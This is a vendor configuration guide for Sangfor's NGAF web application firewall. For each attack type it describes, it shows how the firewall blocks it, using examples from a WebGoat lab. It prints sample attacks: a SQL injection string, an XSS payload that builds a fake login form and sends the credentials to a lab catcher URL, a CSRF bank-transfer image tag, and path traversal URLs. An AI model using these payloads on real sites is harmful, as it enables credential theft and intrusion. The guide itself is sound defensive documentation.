NGAF

WAF Configuration Guide

Version 8.0.5
Change Log
Date Change Description

October 9, 2018 Version 8.0.5 document release.

CONTENT

Chapter 1 Background ....................................................................................................1

1.1 Functionality Introduction ........................................................................................................................1

1.2 Application Scenario.................................................................................................................................1

1.3 Necessary Conditions................................................................................................................................2

Chapter 2 Protection Against Different Type of Attacks ................................................2

2.1 Website-Based Attacks .............................................................................................................................2

2.1.1 SQL Injection.........................................................................................................................2

2.1.2 XSS attack.........................................................................................................................4

2.1.3 Trojan.........................................................................................................................5

2.1.4 Website Scan.........................................................................................................................6

2.1.5 WEBSHELL.........................................................................................................................6

2.1.6 CSRF.........................................................................................................................6

2.1.7 File Inclusion.........................................................................................................................7

2.1.8 Path Traversal.........................................................................................................................7

2.1.9 Information Disclosure.........................................................................................................................8

2.1.10 Web Site Vulnerabilities.........................................................................................................................9

2.1.11 Restrictive URL access.........................................................................................................................9

2.1.12 Parameters.......................................................................................................................10

2.1.13 Application Hiding.......................................................................................................................11

2.1.14 Password.......................................................................................................................12

2.1.15 Privilege.......................................................................................................................14

2.1.16 HTTP.......................................................................................................................16

2.1.17 Data Leak Protection.......................................................................................................................17

Chapter 3 Troubleshooting ...........................................................................................19

NGAF WAF Guide V8.0.5

Chapter 1 Background

1.1 Functionality Introduction

A web application firewall (WAF) is an appliance, server plugin, or filter that applies a
set of rules to an HTTP conversation. Generally, these rules cover common attacks
such as cross-site scripting (XSS) and SQL injection. By customizing the rules to your
application, many attacks can be identified and blocked. The effort to perform this
customization can be significant and needs to be maintained as the application is
modified.
Sangfor Web Application Protection supports gateway/bridge/virtual wire/mirror
mode deployment. It shall be able to provide protection as long as the traffic passes
through the firewall appliance.

1.2 Application Scenario

The firewall is deployed as route mode and the server is placed at DMZ zone

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 1

NGAF WAF Guide V8.0.5

1.3 Necessary Conditions

Web application protection policies need to be configured properly to ensure proper
protection against any potential attacks.

Chapter 2 Protection Against Different Type

of Attacks

2.1 Website-Based Attacks

2.1.1 SQL Injection
Lesson location: Injection Flaws-->String SQL Injection
Normal user will input name to search his information, such as input "sangfor"
server will execute " SELECT * FROM user_data WHERE last_name = 'sangfor' "

So hacker will use this SQL to get more information such as input "sangfor' or '1'='1
"
Change SQL to" SELECT * FROM user_data WHERE last_name = 'sangfor' or '1'='1' "

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 2

NGAF WAF Guide V8.0.5

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 3

NGAF WAF Guide V8.0.5

2.1.2 XSS attack

Lesson location: Cross-Site Scripting(XSS)-->phishing with XSS
normal user will input something to search such as "XSS" like google

Attack will input some HTML and Script in the box such as
"</form><script>function hack(){ XSSImage=new Image;
XSSImage.src="http://192.200.19.86:8080/webgoat/catcher?PROPERTY=yes&user="
+document.phish.user.value + "&password=" + document.phish.pass.value +
"";alert("Had this been a real attack... Your credentials were just stolen. User Name
= " + document.phish.user.value + " Password = " + document.phish.pass.value);}
</script><form name="phish"><br><br><HR><H3>This feature requires account
login:</H2><br><br>Enter Username:<br><input type="text"
name="user"><br>Enter Password:<br><input type="password" name =
"pass"><br><input type="submit" name="login" value="login"
onclick="hack()"></form><br><br><HR>
"

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 4

NGAF WAF Guide V8.0.5

The code will run in the result and show a fake form to other user, when other user
input his username and password, this information will send to hacker's URL
" http://192.200.19.86:8080/webgoat/catcher?PROPERTY=yes&user="

Sangfor WAF will deny HTML and Script and record as follow:

2.1.3 Trojan

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 5

NGAF WAF Guide V8.0.5

Manually Trojan horse is a program that is designed by attacker to be downloaded

automatically through an HTML page. Attack designs that HTML page and write
malicious code or script to take advantage of vulnerabilities in Web browser, making
the browser download and execute the Trojan automatically when user visit that page.

2.1.4 Website Scan

Before attack, hacker always use tools to scan all website, according to the scan result
hacker may know some information to attack.
Sangfor WAF can deny scan by matching WAF Signature Database and attempt count.

2.1.5 WEBSHELL
In some scenario website may need user upload file, hacker can upload webshell and
use other tool to visit this webshell and then control all website.
Hacker upload a webshell jsp and then visit this webshell and control all website.

2.1.6 CSRF
CSRF, cross-site request forgery, is a type of malicious exploit of a website where
unauthorized commands are transmitted from a user that the website trusts.
such as:
User A is visiting his online bank http://www.bank.com
Hack B send a mail to A , this mail contain a picture
<img src=”http://www.bank.com/transfer.php?accound=B&amount=1000”/>
When A check the mail and click this picture, A will request to this URL
" http://www.bank.com/transfer.php?accound=B&amount=1000"
and transfer to B money 1000
Sangfor WAF can deny this attack by HTTP header referrer field.
in follow configure, we can only
visit http://www.bank.com/transfer.php from http://www.bank.com
So even if user A click the picture and request to the transfer page ,the traffic will be
denied, because the request not from http://www.bank.com.

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 6

NGAF WAF Guide V8.0.5

2.1.7 File Inclusion

File Inclusion is a type of attack specific on PHP websites. It allows attacker to specify
a remote file that is executed by variable as parameter if PHP variable filtering is not
strict, parameter being not checked whether it is on local or remote machine. In case
that the submitted file contains malicious code or is PHP Trojan, the file will be
executed with Web privilege. Below is an example of the rule found under WAF (Web
Application Firewall) database. Sangfor WAF will be denying the following attack.

2.1.8 Path Traversal

Hackers can try all the website directory and execute some dangerous action by path
traversal. such as :
http://sangfor.com/show.asp?view=../../../../../Windows/system.ini
http://sangfor.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:\

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 7

NGAF WAF Guide V8.0.5

we can test in our LAB environment

http://192.200.19.86:8080/webgoat/attack?Screen=138&menu=200&show=Params/..
/../../webgoat/lessons/RoleBasedAccessControl/images/accessControl.jpg

2.1.9 Information Disclosure

Some page in the website may can't open and it contain many errors, this errors can
tell hacker a lot of information and then attack the server.
"http://192.200.19.86:8080/webgoat/uploads/in.jsp" is a error page
before enable WAF it will show much information.

Nothing will be shown upon enabling the WAF protection.

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 8

NGAF WAF Guide V8.0.5

2.1.10 Web Site Vulnerabilities

Sometimes system or program not update timely, it may exist some vulnerabilities,
hackers may use try to use scan to find this vulnerabilities and use them attack
website.
Sangfor WAF will deny the traffic which match the WAF Signature Database.

2.1.11 Restrictive URL access

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 9

NGAF WAF Guide V8.0.5

Website Administrator can use this function to set user can visit directory or page.
such as http://www.sangfor.com/manage/xxxx for administrator to manage
website http://www.sangfor.com/main/xxx for user to visit
we can configure as follow, just allow user visit http://www.sangfor.com/main/xxx

2.1.12 Parameters
This is a very intelligent function, NGAF WAF will study user's data.
Such as 95% user post letters and numbers to server ,but once someone post other
special character to server, WAF will think it is a abnormal action, administrator can
set deny or log event.

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 10

NGAF WAF Guide V8.0.5

2.1.13 Application Hiding

FTP
Before enable FTP application hiding

After enable FTP application hiding

HTTP
http://192.200.19.86:8080/webgoat/uploads/1.jsp is a not available URL , but hacker
can try to get information from server response
Before enable Sangfor WAF ,we can see this website not have 1.jsp this file and the
website run by Apache Tomcat/7.0.27

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 11

NGAF WAF Guide V8.0.5

After enable Sangfor WAF, we can get nothing from server response

2.1.14 Password

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 12

NGAF WAF Guide V8.0.5

Sangfor WAF can detect FTP/HTTP password whether weak or strong, detect web-
access cleartext request inspection
even if user use weak password to login FTP/HTTP, WAF will not deny the traffic. But
can use defense against brute-force attack together.

Http Defense against brute-force attack lesson location:

Improper Error Handling-->Fail Open Authentication Scheme

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 13

NGAF WAF Guide V8.0.5

2.1.15 Privilege

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 14

NGAF WAF Guide V8.0.5

In this function, administrator can define which file can upload to the server, because
hacker may use upload function upload webshell or torjan.
File upload restriction by file type, if hacker upload cheat file type webshell or torjan,
traffic will be denied by webshell or torjan.
Lesson location: Malicious Execution-->Malicious File Execution

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 15

NGAF WAF Guide V8.0.5

Administrator can configure URL access right ,define which URL can allow or deny.
If one URL allowed in this function, even if hacker attack to this URL, it will be allowed.

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 16

NGAF WAF Guide V8.0.5

2.1.16 HTTP
Administrator can only allow some HTTP request method, avoid attack by other
request.

For test ,we not allow POST method and then use POST to request, Sangfor WAF deny
the traffic and record as follow.

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 17

NGAF WAF Guide V8.0.5

2.1.17 Data Leak Protection

Sensitive Data Protection
Administrator can use this function protect sensitive data, such as staff
salary/email/md5/phone
If one page contain key word too many times , Sangfor WAF can deny the traffic. The
following rule can be customized according to below snapshots.

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 18

NGAF WAF Guide V8.0.5

File Download Restriction

Sangfor WAF can define which file can be download ,such as can't
download .bak/.sql/.mdb/...
For this test, we set to deny file with .jpg extension.

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 19

NGAF WAF Guide V8.0.5

Chapter 3 Troubleshooting
NGAF Unable To Deny/Locate Attack

1) Make sure the traffic has crossed NGAF, especially NGAF deployed as mirror
mode, we need to make mirror port and guide traffic to NGAF.
2) Check the configuration
Destination IP must be the server real private IP ,not the public NAT ip.
Port must be the server service port.
3) Make sure database is updated to latest version
4) Make sure the option of send TCP reset message to reject request has checked
otherwise NGAF will can't deny attack.

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 20

NGAF WAF Guide V8.0.5

5) Check the log and notice the action is allow or deny, if this is a real attack ,you
can change the database action based on rule ID.
6) Check global exclusion IP list and ensure troubleshooting option is disabled
else it will bypass the following IP.

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 21

NGAF WAF Guide V8.0.5